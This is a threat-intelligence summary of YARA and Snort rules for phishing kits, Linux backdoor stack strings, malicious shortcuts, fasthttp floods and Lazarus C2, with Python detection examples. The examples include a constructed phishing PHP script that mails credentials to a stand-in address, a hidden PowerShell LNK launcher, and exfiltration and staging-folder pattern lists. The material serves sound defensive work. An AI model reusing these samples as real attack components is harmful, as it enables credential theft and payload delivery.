Full Report
The following is the information on YARA and Snort rules (week 5, January 2025) collected and shared by the AhnLab TIP service.

8 YARA Rules

| Detection name | Description | Source |
| --- | --- | --- |
| PK_DHL_Tracking | Detects a phishing kit impersonating DHL | https://github.com/t4d/PhishingKit-Yara-Rules |
| PK_ESL_sigmadev | Detects a phishing kit impersonating ESL Federal Credit Union | https://github.com/t4d/PhishingKit-Yara-Rules |
| PK_Nexi_mobile | Detects a phishing kit impersonating Nexi (Nexi Pay) | […] |
Analysis Summary
This summary focuses on the detection artifacts (YARA and Snort rules) shared by AhnLab TIP for week 5 of January 2025, as these rules are designed to identify specific tools, malware techniques, and threat actor activity.
***
# Tool/Technique: Phishing Kits (Various Brands)
## Overview
A collection of YARA rules (the `PK_*` rules from the t4d/PhishingKit-Yara-Rules repository) that match the files and directory structure of phishing kits impersonating financial institutions and a shipping carrier; the kits exist to harvest credentials.
## Technical Details
- Type: Technique/Malware (Phishing Infrastructure)
- Platform: Web servers hosting the kit (commonly PHP/HTML on compromised or attacker-registered hosts); the rules are applied to kit archives and unpacked files, not to live traffic.
- Capabilities: Mimic legitimate login pages (DHL, ESL Federal Credit Union, Nexi, Peapack-Gladstone, Wells Fargo) for credential theft.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1566 - Phishing
* T1566.002 - Spearphishing Link (the fake login page is reached via a link; most applicable for web-based kits)
* T1566.001 - Spearphishing Attachment (only where the lure HTML is attached rather than linked)
* T1056.003 - Input Capture: Web Portal Capture (the fake login form collects the credentials)
## Functionality
### Core Capabilities
- Detecting specific file signatures related to phishing pages/scripts for DHL, ESL Federal Credit Union, Nexi Pay, Peapack-Gladstone Bank, and Wells Fargo.
### Advanced Features
- One rule per brand: each rule is keyed to that kit's branding and file layout, which is why the batch carries separate rules for DHL, ESL Federal Credit Union, Nexi, Peapack-Gladstone and Wells Fargo.
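To make concrete what a kit-detection rule keys on, here is an added Python example (not code from the page, from AhnLab or from the t4d rule set) that scans a kit archive for the three things a credential-harvesting kit needs: an impersonated brand, a password form, and an exfiltration path. The sample kit files, the brand patterns and the exfiltration markers (`mail()`, Telegram bot API, victim IP capture, redirect to the real site) are constructed for this example; the real `PK_*` rules use their own strings and structure checks.

```python
import io
import re
import zipfile

# Constructed sample kit for this example (not a real kit): a DHL-branded
# login page, the PHP script that receives the form, and a stylesheet.
SAMPLE_KIT_FILES = {
    "dhl/index.html": (
        "<html><title>DHL Express - Track your shipment</title>\n"
        '<form method="post" action="post.php">\n'
        '<input name="email"><input type="password" name="password">\n'
        "<button>Track</button></form></html>\n"
    ),
    "dhl/post.php": (
        "<?php\n"
        "$msg = 'Email: '.$_POST['email'].\"\\n\".'Pass: '.$_POST['password'];\n"
        "$msg .= \"\\nIP: \".$_SERVER['REMOTE_ADDR'];\n"
        "mail('drop@example.invalid', 'DHL rezult', $msg);\n"
        "header('Location: https://www.dhl.com/');\n"
    ),
    "dhl/css/style.css": "body { font-family: Arial, sans-serif; }\n",
}

# Brand strings the PK_* rules in this batch are named after.
BRAND_PATTERNS = {
    "DHL": re.compile(r"\bDHL\b"),
    "ESL Federal Credit Union": re.compile(r"ESL\s+Federal\s+Credit\s+Union", re.I),
    "Nexi": re.compile(r"\bNexi(\s*Pay)?\b"),
    "Peapack-Gladstone": re.compile(r"Peapack[\s-]*Gladstone", re.I),
    "Wells Fargo": re.compile(r"Wells\s*Fargo", re.I),
}

# Hypothetical exfiltration markers common in PHP kits (assumed, not taken from the rules).
EXFIL_PATTERNS = {
    "php-mail": re.compile(r"\bmail\s*\("),
    "telegram-bot-api": re.compile(r"api\.telegram\.org/bot"),
    "curl-post": re.compile(r"CURLOPT_POSTFIELDS"),
    "victim-ip-capture": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR"),
    "redirect-to-real-site": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
}
PASSWORD_FIELD = re.compile(r"<input[^>]+type\s*=\s*['\"]password['\"]", re.I)
TEXT_SUFFIXES = (".html", ".htm", ".php", ".js", ".txt")


def build_kit_zip(files):
    """Pack the constructed files into an in-memory zip, the form kits are usually traded in."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def scan_kit(zip_bytes):
    """Scan every text file in the archive and report what a PK_* style rule would key on."""
    report = {"brands": set(), "exfil": set(), "password_form": False, "files": 0}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(TEXT_SUFFIXES):
                continue
            report["files"] += 1
            text = zf.read(info).decode("utf-8", errors="replace")
            for brand, pat in BRAND_PATTERNS.items():
                if pat.search(text):
                    report["brands"].add(brand)
            for marker, pat in EXFIL_PATTERNS.items():
                if pat.search(text):
                    report["exfil"].add(marker)
            if PASSWORD_FIELD.search(text):
                report["password_form"] = True
    # A kit needs all three: a brand to impersonate, a credential form, and a way to exfiltrate.
    report["is_phishing_kit"] = bool(report["brands"]) and report["password_form"] and bool(report["exfil"])
    report["brands"] = sorted(report["brands"])
    report["exfil"] = sorted(report["exfil"])
    return report


if __name__ == "__main__":
    print(scan_kit(build_kit_zip(SAMPLE_KIT_FILES)))
```

The three-way conjunction is what keeps the check from firing on a legitimate brand site mirror (brand but no exfil) or on a generic contact form (exfil but no brand); the real rules encode the same idea as file-level string and structure conditions.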
## Indicators of Compromise
- File Hashes: N/A (YARA rule signatures only)
- File Names: N/A (Detection based on content signature)
- Registry Keys: N/A
- Network Indicators: The operation implies network communication for submitting stolen credentials, but specific C2s are not listed in the rule descriptions.
- Behavioral Indicators: server-side scripts that receive the submitted form data, forward it (typically by e-mail or to a remote endpoint) and then redirect the victim to the genuine site.
## Associated Threat Actors
- General cybercriminals focused on financial fraud and credential theft.
## Detection Methods
- Signature-based detection: Provided by specific YARA rules (e.g., `PK_DHL_Tracking`, `PK_WellsFargo_RD265`).
- Behavioral detection: Not explicitly covered by these specific YARA rules, but the resultant phishing activity would be detectable.
- YARA rules: `PK_*` rules detailed in the article.
## Mitigation Strategies
- User education regarding phishing attempts.
- Phishing-resistant MFA (FIDO2/WebAuthn) so a harvested password is not sufficient to log in.
- Blocking known phishing domains at DNS or the web proxy, and scanning web-server uploads and compromised hosts with the `PK_*` rules to find deployed kits.
- Utilizing anti-phishing browser extensions.
## Related Tools/Techniques
- Other credential harvesting frameworks.
***
# Tool/Technique: SEASPY/Bluez Backdoor Encoding Techniques
## Overview
YARA rules targeting two implementation artifacts observed in Linux malware, specifically the SEASPY and Bluez backdoors: a custom byte-encoding routine and strings assembled on the stack at runtime (stack strings).
## Technical Details
- Type: Malware Technique / Backdoor Artifacts
- Platform: Linux (LNX)
- Capabilities: Detection of distinctive binary encoding (`ByteEncoder`) and string handling (`StackString`) methods used by SEASPY and Bluez.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1027 - Obfuscated Files or Information (stack strings and custom byte encoding exist to hide strings and payload data from static analysis)
* Caveat: the rule descriptions cover on-disk binary artifacts only. Mapping them to C2 techniques (T1071 Application Layer Protocol, T1573 Encrypted Channel) or to T1027.003 Steganography is not supported by what the rules match and should be confirmed from the sample, not inferred from the rule name.
## Functionality
### Core Capabilities
- Detecting suspicious binary encoding patterns indicative of the SEASPY or Bluez malware loaders/payloads.
- Detecting stack-based string construction: the string is written into the stack frame with immediate-operand moves at runtime, so it never appears contiguously in the binary and defeats `strings`-based triage.
### Advanced Features
- Signatures are tuned to the low-level implementation details of known Linux backdoors.
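The stack-string technique the `SUSP_LNX_StackString_Technique_Jan25` rule targets is easiest to see by reversing it. The following added Python example (not the AhnLab rule and not code from either backdoor) does what such a YARA hex pattern does in spirit: it scans raw x86-64 code for runs of "store immediate into [rbp+disp]/[rsp+disp]" instructions and reassembles the bytes by displacement. The code bytes are constructed for this example; the opcode encodings handled are a subset chosen for illustration, and a real rule or scanner would cover more forms (other base registers, 16-bit stores, SSE moves).

```python
import string
import struct

# Bytes accepted inside a recovered string (ASCII text, no vertical-tab/form-feed).
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}


def _disp8(b):
    """Signed 8-bit displacement as used in [rbp+disp8] / [rsp+disp8] addressing."""
    return struct.unpack("b", bytes([b]))[0]


def _match_store(data, i):
    """If a recognised 'store immediate into the stack frame' instruction starts at
    data[i], return (length, base, disp, stored_bytes); otherwise None.
    Encodings handled (x86-64):
      C6 45 d  i        mov byte  [rbp+d], i
      C6 44 24 d i      mov byte  [rsp+d], i
      C7 45 d  i32      mov dword [rbp+d], i32
      C7 44 24 d i32    mov dword [rsp+d], i32
      48 B8 i64 + 48 89 45 d      movabs rax, i64 ; mov [rbp+d], rax
      48 B8 i64 + 48 89 44 24 d   movabs rax, i64 ; mov [rsp+d], rax
    """
    n = len(data) - i
    if n >= 4 and data[i] == 0xC6 and data[i + 1] == 0x45:
        return 4, "rbp", _disp8(data[i + 2]), data[i + 3:i + 4]
    if n >= 5 and data[i:i + 3] == b"\xC6\x44\x24":
        return 5, "rsp", _disp8(data[i + 3]), data[i + 4:i + 5]
    if n >= 7 and data[i] == 0xC7 and data[i + 1] == 0x45:
        return 7, "rbp", _disp8(data[i + 2]), data[i + 3:i + 7]
    if n >= 8 and data[i:i + 3] == b"\xC7\x44\x24":
        return 8, "rsp", _disp8(data[i + 3]), data[i + 4:i + 8]
    if n >= 14 and data[i:i + 2] == b"\x48\xB8":
        imm = data[i + 2:i + 10]
        if data[i + 10:i + 13] == b"\x48\x89\x45":
            return 14, "rbp", _disp8(data[i + 13]), imm
        if n >= 15 and data[i + 10:i + 14] == b"\x48\x89\x44\x24":
            return 15, "rsp", _disp8(data[i + 14]), imm
    return None


def _flush(frame, min_len, out):
    """Lay the stores out by displacement, split on NUL and keep printable runs."""
    for base in frame:
        buf = b"".join(v for _, v in sorted(frame[base].items()))
        for seg in buf.split(b"\x00"):
            if len(seg) >= min_len and all(c in PRINTABLE for c in seg):
                out.append(seg.decode("ascii"))


def find_stack_strings(data, min_len=4):
    """Recover strings assembled on the stack by runs of immediate stores.
    A run ends at the first byte that is not one of the store encodings."""
    out, frame, i = [], {}, 0
    while i < len(data):
        m = _match_store(data, i)
        if m is None:
            if frame:
                _flush(frame, min_len, out)
                frame = {}
            i += 1
            continue
        length, base, disp, stored = m
        frame.setdefault(base, {})[disp] = stored
        i += length
    if frame:
        _flush(frame, min_len, out)
    return out


# Constructed sample (not from SEASPY/Bluez): "/bin/sh" written one byte at a time
# into [rbp-0x10..], then "/usr/bin" via movabs+store and "/ls" via a dword store.
SAMPLE_CODE = bytes.fromhex(
    "c645f02f c645f162 c645f269 c645f36e c645f42f c645f573 c645f668 c645f700"
    "488d7df0 e800000000"                       # lea rdi,[rbp-0x10]; call ... (ends the run)
    "48b82f7573722f62696e 4889442420"           # movabs rax,"/usr/bin"; mov [rsp+0x20],rax
    "c74424282f6c7300 c3"                       # mov dword [rsp+0x28],"/ls\0"; ret
)

if __name__ == "__main__":
    print(find_stack_strings(SAMPLE_CODE))   # ['/bin/sh', '/usr/bin/ls']
```

Note that `strings` on `SAMPLE_CODE` would find neither path, which is exactly the triage gap the technique creates; the `min_len` threshold is what keeps random `C6 45` byte pairs in unrelated code from producing noise.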
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A (Linux focus)
- Network Indicators: N/A (Detection focuses on binary artifacts)
- Behavioral Indicators: binaries whose static strings lack the paths, commands or hostnames they evidently use at runtime, because those are assembled on the stack or decoded by a custom routine.
## Associated Threat Actors
- Actors deploying SEASPY or Bluez backdoors. SEASPY has been publicly documented as a passive backdoor deployed on Barracuda ESG appliances in an espionage campaign; the rule descriptions on this page do not name an operator for either family.
## Detection Methods
- Signature-based detection: Provided by YARA rules (`SUSP_LNX_ByteEncoder_Jan25`, `SUSP_LNX_StackString_Technique_Jan25`).
## Mitigation Strategies
- Strict integrity monitoring of system binaries on Linux hosts and appliances, with scheduled YARA scans of the file system.
- Application allowlisting so unexpected binaries cannot execute.
## Related Tools/Techniques
- Other Linux malware families utilizing custom encoding/obfuscation.
***
# Tool/Technique: LNK File Suspicious Folder Usage
## Overview
A YARA rule that flags LNK (shortcut) files whose target, working directory or arguments reference folders attackers commonly use to stage payloads; such shortcuts are a common initial-access lure in which the shortcut, not the payload, is what the user double-clicks.
## Technical Details
- Type: Technique / Malicious Shortcut Artifact
- Platform: Windows
- Capabilities: Identifies LNK files referencing unusual or commonly abused paths for payload delivery.
- First Seen: N/A (Rule updated January 2025)
## MITRE ATT&CK Mapping
* T1204 - User Execution
* T1204.002 - Malicious File
* T1036 - Masquerading
* T1036.005 - Match Legitimate Name or Location
## Functionality
### Core Capabilities
- Matching shortcut target, working-directory or argument strings that reference suspicious folders (user-writable locations commonly used to stage payloads) or use relative path traversal to reach an interpreter.
### Advanced Features
- Focuses on the structure of the shortcut file itself rather than the target payload.
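Because the rule keys on the shell link structure rather than the payload, it helps to see which structure fields carry the folder references. The following added Python example (not the AhnLab rule and not code from the page) parses the MS-SHLLINK header and StringData fields, then applies a folder check of the kind the rule name implies. The `SUSPICIOUS_FOLDERS` list and the two sample shortcuts are constructed for this example; the rule's actual folder list is not published on this page.

```python
import struct

# MS-SHLLINK fixed header: size 0x4C and the ShellLink CLSID 00021401-0000-0000-C000-000000000046.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits used here (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight

# Folders that need no privileges to write to and are therefore popular for staging
# payloads. Hypothetical list for this example; the rule's own list is not published here.
SUSPICIOUS_FOLDERS = (
    "%temp%", "%tmp%", "%appdata%", "%localappdata%", "%programdata%", "%public%",
    "\\appdata\\", "\\programdata\\", "\\users\\public\\", "\\temp\\", "\\windows\\tasks\\",
)
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data):
    """Parse the header, skip the optional IDList/LinkInfo blocks and read the StringData."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize (u32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "show_command": show_command}
    for bit, key in STRING_FIELDS:                 # StringData: CountCharacters (u16) + chars
        out[key] = ""
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                out[key] = data[pos:pos + count].decode("cp1252", errors="replace")
                pos += count
    return out


def suspicious_folder_findings(lnk):
    """Return the reasons a parsed shortcut looks like a payload launcher (empty if none)."""
    findings = []
    for key in ("relative_path", "working_dir", "arguments", "icon_location"):
        value = lnk[key].lower()
        for folder in SUSPICIOUS_FOLDERS:
            if folder in value:
                findings.append(f"{key} references {folder}")
                break
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden via SW_SHOWMINNOACTIVE")
    return findings


def build_lnk(relative_path, working_dir, arguments, show_command=1):
    """Build a minimal Unicode .lnk (StringData only) so the example runs without real samples."""
    flags, body = IS_UNICODE, b""
    for bit, value in ((HAS_RELATIVE_PATH, relative_path), (HAS_WORKING_DIR, working_dir),
                       (HAS_ARGUMENTS, arguments)):
        if value:
            flags |= bit
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body


# Constructed samples (not real malware): a lure that runs a script from %APPDATA% with a
# hidden window, and an ordinary application shortcut.
SAMPLE_MALICIOUS = build_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "%APPDATA%", "-w hidden -ep bypass -f %APPDATA%\\update.ps1", show_command=SW_SHOWMINNOACTIVE)
SAMPLE_BENIGN = build_lnk("..\\..\\Program Files\\Notepad++\\notepad++.exe",
                          "C:\\Program Files\\Notepad++", "")

if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, suspicious_folder_findings(parse_lnk(sample)))
```

Real-world shortcuts usually also carry a LinkTargetIDList and LinkInfo block (both skipped here by size) and ExtraData blocks after the StringData (ignored here); the environment-variable and tracker blocks in ExtraData are worth parsing too, since they often leak the attacker's build machine name and original path.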
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A (any `.lnk` file; the rule matches the shell link structure, not the file name).
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: a shortcut delivered by e-mail or inside an archive that launches a script interpreter or LOLBin instead of an application, often with a hidden window.
## Associated Threat Actors
- General threat actors using social engineering to trick users into executing malicious shortcuts.
## Detection Methods
- Signature-based detection: Provided by YARA rule (`SUSP_LNK_Suspicious_Folders_Jan25`).
## Mitigation Strategies
- Block `.lnk` files at the mail gateway and in web downloads (shortcuts are almost never legitimate attachments), and show file extensions so a shortcut cannot pass as a document.
- Scan LNK files on arrival and on execution, and alert when a shortcut launches a script interpreter or LOLBin from a user-writable folder.
## Related Tools/Techniques
- Other shortcut file abuse (e.g., related to USB drops).
***
# Tool/Technique: FastHTTP Activity and Vulnerability Exploitation
## Overview
Snort rules that flag HTTP traffic produced by fasthttp, a high-performance Go HTTP library whose client sends the bare User-Agent value `fasthttp` by default (legitimate Go services use it, but so do scanners and flood tools), together with signatures for exploitation attempts against known product vulnerabilities.
## Technical Details
- Type: Tool/Framework Behavior & Vulnerability Exploitation
- Platform: Network Traffic / Web Servers
- Capabilities:
  1. Detection of the User-Agent associated with **fasthttp** clients (potential botnet, scanner or custom-tool activity).
  2. Detection of **Denial of Service (DoS)** request floods linked to fasthttp-based tools.
  3. Signatures for specific **vulnerability exploitation attempts** against Progress WhatsUp Gold, Nuuo NVR and Axis Communications devices.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1498 - Network Denial of Service (DoS)
* T1498.001 - Application Layer DoS (Related to FastHTTP detection)
* T1190 - Exploit Public-Facing Application (Vulnerability specific rules)
## Functionality
### Core Capabilities
- Identifying requests that carry the fasthttp User-Agent, whether outbound from the monitored network (a local host running such a client) or inbound (scanning or flooding).
- Recognizing specific exploit payloads targeting CVEs in network hardware and software (Progress WhatsUp Gold, Nuuo NVR, Axis cameras).
### Advanced Features
- Targeted detection of command injection attempts (`CVE-2018-10660` family for Axis).
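The User-Agent rule and the DoS rule answer different questions, and the difference is worth seeing on data. The following added Python example (not AhnLab's or Emerging Threats' rule logic, and not code from the page) runs a `fasthttp` User-Agent match over constructed access-log lines and layers on a Snort-style `detection_filter` (track by source, N hits within S seconds), which is what separates a single Go service probe from a flood. The log lines, addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the parsed event or None for lines that do not match the log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    return ev


def is_fasthttp_ua(ua):
    """The library's default client User-Agent header value is the bare token 'fasthttp'."""
    return ua.strip().lower().startswith("fasthttp")


def detect(lines, count=20, seconds=10):
    """UA match plus a Snort-style detection_filter (track by_src, count N, seconds S):
    a source is reported once it sends `count` matching requests within `seconds`."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    window = timedelta(seconds=seconds)
    recent = defaultdict(deque)          # per-source sliding window of matching timestamps
    ua_hits, dos_sources = 0, []
    for ev in events:
        if not is_fasthttp_ua(ev["ua"]):
            continue
        ua_hits += 1
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while ev["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= count and ev["ip"] not in dos_sources:
            dos_sources.append(ev["ip"])
    return {"events": len(events), "ua_hits": ua_hits, "dos_sources": dos_sources}


def _synth(ip, ua, n, start, step):
    """Constructed log lines for the example (not captured traffic)."""
    return [
        f'{ip} - - [{(start + i * step).strftime(TS_FMT)}] "GET /api/status HTTP/1.1" 200 512 "-" "{ua}"'
        for i in range(n)
    ]


_T0 = datetime(2025, 1, 28, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    _synth("10.0.0.5", "fasthttp", 25, _T0, timedelta(milliseconds=300))       # flood from one host
    + _synth("10.0.0.9", "fasthttp", 1, _T0, timedelta(seconds=0))              # one Go service probe
    + _synth("203.0.113.7", "Mozilla/5.0 (X11; Linux x86_64)", 3, _T0, timedelta(seconds=1))
    + ["garbage line that does not parse"]
)

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))   # {'events': 29, 'ua_hits': 26, 'dos_sources': ['10.0.0.5']}
```

The host `10.0.0.9` trips the UA match but not the rate filter, which is the expected outcome for an internal Go service; on its own the UA rule is a lead to pivot on, not a verdict.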
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: the default `fasthttp` User-Agent header value, matched by the rule `ET USER_AGENTS FastHTTP User-Agent Observed Outbound`; on its own this is a low-fidelity indicator because legitimate Go software sends the same header.
- Behavioral Indicators: Traffic patterns matching known DoS attacks or exploit signatures for the listed CVEs.
## Associated Threat Actors
- Botnet operators (FastHTTP detection).
- Vulnerability exploiters targeting unpatched infrastructure.
## Detection Methods
- Signature-based detection: Provided by Snort rules (e.g., `ET USER_AGENTS FastHTTP...`, `ET WEB_SPECIFIC_APPS ... CVE-XXXX`).
## Mitigation Strategies
- Patching vulnerable assets immediately (Progress WhatsUp Gold, Nuuo NVR, Axis cameras).
- Rate-limiting sources that send the `fasthttp` User-Agent rather than blocking the string outright, since legitimate Go clients send it too and any attacker can change it; treat the UA rule as a lead to pivot on, not a block list.
## Related Tools/Techniques
- Other network DoS tools.
***
# Tool/Technique: Fake Microsoft Teams & Lazarus APT Activity
## Overview
Snort rules specifically alerting on network communication patterns matching known C2 activity related to fake Microsoft Teams malware and infrastructure used by the Lazarus Group.
## Technical Details
- Type: Malware Family / APT Activity
- Platform: Network Traffic / Endpoint Activity (Implied)
- Capabilities:
1. Detection of binary payloads or C2 requests related to malicious versions masquerading as Microsoft Teams.
2. Detection of specific command and control (C2) communication patterns attributed to the Lazarus APT group utilizing an "Electron" framework.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1071 - Application Layer Protocol
* T1071.001 - Web Protocols (C2 traffic detection)
* T1566.001 - Spearphishing Attachment (If the VBS payload is delivered via email)
* T1059 - Command and Scripting Interpreter (VBS payload)
## Functionality
### Core Capabilities
- Identifying VBScript payloads delivered inbound under Microsoft Teams branding.
- Matching the HTTP GET beacons (three signature variants, M1 to M3) attributed to Lazarus Electron-based implants.
### Advanced Features
- Multi-stage detection targeting both the initial payload delivery (VBS) and subsequent C2 communication (Lazarus Electron).
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: C2 GET requests matching Lazarus patterns (`ET TROJAN Lazarus APT Electron CnC Activity (GET) M1/M2/M3`).
- Behavioral Indicators: Inbound VBS payloads disguised as Teams artifacts.
## Associated Threat Actors
- Lazarus Group (APT Organization).
- General malware distributors leveraging popular collaboration tools for distraction/payload delivery.
## Detection Methods
- Signature-based detection: Provided by Snort rules (`ET TROJAN Fake Microsoft Teams...`, `ET TROJAN Lazarus APT Electron...`).
## Mitigation Strategies
- Install Microsoft Teams only from official distribution channels (Microsoft's site or the platform store) and keep it updated.
- Restrict Windows Script Host so VBScript cannot run from user-writable locations (AppLocker/WDAC rules, or reassigning the `.vbs` handler to a text editor where scripts are not needed).
- Monitor outbound HTTP for the Lazarus C2 signatures and treat any host that trips them as a likely compromise until the traffic is explained.
## Related Tools/Techniques
- Other social engineering campaigns using collaboration application impersonation.